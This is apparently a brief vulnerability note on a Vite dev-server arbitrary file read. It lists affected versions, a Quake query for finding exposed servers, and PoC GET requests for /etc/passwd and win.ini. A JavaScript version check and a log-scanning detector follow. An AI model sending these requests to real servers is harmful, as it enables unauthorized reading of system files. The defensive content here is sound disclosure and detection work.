Vite Arbitrary File Read

Quake search syntax

response:"/@vite/client"

Affected versions

6.2.0 <= version <= 6.2.2
6.1.0 <= version <= 6.1.1
6.0.0 <= version <= 6.0.11
5.0.0 <= version <= 5.4.14
version <= 4.5.9

PoC

GET /etc/passwd?raw HTTP/1.1
GET /@fs/C://windows/win.ini?import&raw?? HTTP/1.1
GET /@fs/etc/passwd?import&raw?? HTTP/1.1

Reproduction

[Screenshot: 2025-03-27T14:45:03.png]
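
A defender-side check built from the affected ranges and request lines listed above (added example, not code from the original post): `isAffected` tests an installed Vite version against the listed ranges, and `suspiciousRequests` scans access-log lines for a `raw` query flag on a `/@fs/` path or with trailing `?` characters. The function names, the access-log format and the sample log lines are assumptions; pre-release suffixes are ignored, and the first PoC line, which has neither marker, is not matched.

```javascript
// Added example. Ranges and request shapes are copied from this page;
// function names and the access-log format are assumptions.
const AFFECTED = [
  ["6.2.0", "6.2.2"], ["6.1.0", "6.1.1"], ["6.0.0", "6.0.11"],
  ["5.0.0", "5.4.14"], ["0.0.0", "4.5.9"], // last row encodes "version <= 4.5.9"
];

// "major.minor.patch" -> [n, n, n]; a pre-release/build suffix is ignored (assumption).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return m.slice(1).map(Number);
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// True when the installed Vite version falls inside one of the listed ranges.
function isAffected(version) {
  const v = parseVersion(version);
  return AFFECTED.some(([lo, hi]) =>
    compareVersions(v, parseVersion(lo)) >= 0 && compareVersions(v, parseVersion(hi)) <= 0);
}

// Return request targets that carry a "raw" query flag and either go through
// /@fs/ or end the query with stray "?" characters, as in the page's PoC lines.
function suspiciousRequests(logLines) {
  return logLines.map((line) => /"[A-Z]+ (\S+) HTTP\/[\d.]+"/.exec(line))
    .filter(Boolean).map((m) => m[1]).filter((target) => {
      const q = target.indexOf("?");
      if (q === -1) return false;
      const path = target.slice(0, q), query = target.slice(q + 1);
      const hasRaw = query.split(/[&?]/).includes("raw");
      return hasRaw && (path.startsWith("/@fs/") || query.endsWith("?"));
    });
}

// Constructed sample access-log lines (not from a real server).
const SAMPLE_LOG = [
  '10.0.0.5 - - [27/Mar/2025:14:40:01 +0000] "GET /src/main.ts HTTP/1.1" 200 512',
  '10.0.0.9 - - [27/Mar/2025:14:41:12 +0000] "GET /@fs/etc/passwd?import&raw?? HTTP/1.1" 200 1830',
  '10.0.0.5 - - [27/Mar/2025:14:41:30 +0000] "GET /src/notes.txt?raw HTTP/1.1" 200 77',
];
console.log(isAffected("6.2.2"), suspiciousRequests(SAMPLE_LOG));
```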
